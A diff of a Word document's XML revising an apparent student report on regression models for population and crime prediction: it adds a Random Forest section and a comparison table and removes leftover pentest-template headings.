@@ -14199,7 +14506,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -14288,8 +14595,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Lasso Regression:</w:t>
       </w:r>
     </w:p>
@@ -14308,55 +14623,6 @@
           <w:noProof/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328CA477" wp14:editId="5475E0FD">
-            <wp:extent cx="2841812" cy="882501"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="662763721" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="662763721" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="2850563" cy="885218"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -14432,25 +14698,44 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Random Forest Regressor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">After Understanding PCA e Linear </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">Regression, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> we</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> will now use only the principal features of our datasets to predict population growth and crime rates.</w:t>
+        <w:t xml:space="preserve">To compare the performance of different models. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> I also applied </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Random Forest Regressor</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14458,27 +14743,7 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">First, we </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>will to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> predict </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">population growth for the next </w:t>
-      </w:r>
-      <w:r>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> years. Then, we will use this result as an input to a linear regression model to predict crime rates for the next 8 years. </w:t>
+        <w:t>Applying the Random Forest Regressor model, this was the result:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14486,71 +14751,196 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>Predicting Population growth:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">For this purpose, I’ve created a new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with a range of years from 2023 to 2030, and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aplyied</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the model </w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lr_pop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">” to predict the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>popularion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65B882A9" wp14:editId="39875FDB">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2122805</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>5080</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3765550" cy="621030"/>
+                <wp:effectExtent l="0" t="0" r="25400" b="26670"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="876279620" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3765550" cy="621030"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t>With</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> a </w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramStart"/>
+                            <w:r>
+                              <w:t xml:space="preserve">MSE </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> very</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> low (</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>0.00592889</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve">) and </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve">an R-squared </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>very high (</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>0.99326039</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>, t</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve">his </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> model also performs very </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>well.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="65B882A9" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:167.15pt;margin-top:.4pt;width:296.5pt;height:48.9pt;z-index:251684864;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t>With</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> a </w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:t xml:space="preserve">MSE </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> very</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> low (</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>0.00592889</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve">) and </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve">an R-squared </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>very high (</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>0.99326039</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>, t</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve">his </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> model also performs very </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>well.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72044DDC" wp14:editId="2A2BD64D">
-            <wp:extent cx="5191125" cy="2828925"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
-            <wp:docPr id="1394955231" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7DD861" wp14:editId="303BC2E0">
+            <wp:extent cx="1820779" cy="932923"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="635"/>
+            <wp:docPr id="814066475" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -14558,7 +14948,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1394955231" name=""/>
+                    <pic:cNvPr id="814066475" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -14570,7 +14960,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5191125" cy="2828925"/>
+                      <a:ext cx="1841501" cy="943540"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -14586,331 +14976,595 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>fter</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, I </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>applyied</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the outcome in a new model </w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lr_crime</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">”, to predict the crime rate based on the population </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>outcomed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc59959353"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– Information Gathering</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
+        <w:rPr>
+          <w:b/>
           <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc59959354"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Comparing the results:</w:t>
+      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="9356" w:type="dxa"/>
-        <w:tblInd w:w="-10" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-        </w:tblBorders>
-        <w:shd w:val="clear" w:color="auto" w:fill="CED7E7"/>
-        <w:tblLayout w:type="fixed"/>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9356"/>
+        <w:gridCol w:w="3209"/>
+        <w:gridCol w:w="3209"/>
+        <w:gridCol w:w="3210"/>
       </w:tblGrid>
       <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="11234"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="9356" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
+            <w:tcW w:w="3209" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
               </w:rPr>
-              <w:t xml:space="preserve">The </w:t>
+              <w:t>Linear Regression:</w:t>
             </w:r>
           </w:p>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>MSE train: 0.000, test: 0.002</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>R^2 train: 1.000, test: 0.997</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="NormalWeb"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3209" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Lasso Regression: </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>Training set score: 1.00</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>Test set score: 1.00</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="NormalWeb"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3210" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>Random Forest Regressor:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>MSE: 0.00592889</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="HTMLPreformatted"/>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:wordWrap w:val="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="var(--jp-code-font-family)" w:hAnsi="var(--jp-code-font-family)"/>
+              </w:rPr>
+              <w:t>R-squared: 0.99326039</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="NormalWeb"/>
+            </w:pPr>
+          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:b/>
           <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc59959356"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>3.4 Sample Report – Maintaining Access</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Conclusion:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">All three models have performed well, </w:t>
+      </w:r>
+      <w:r>
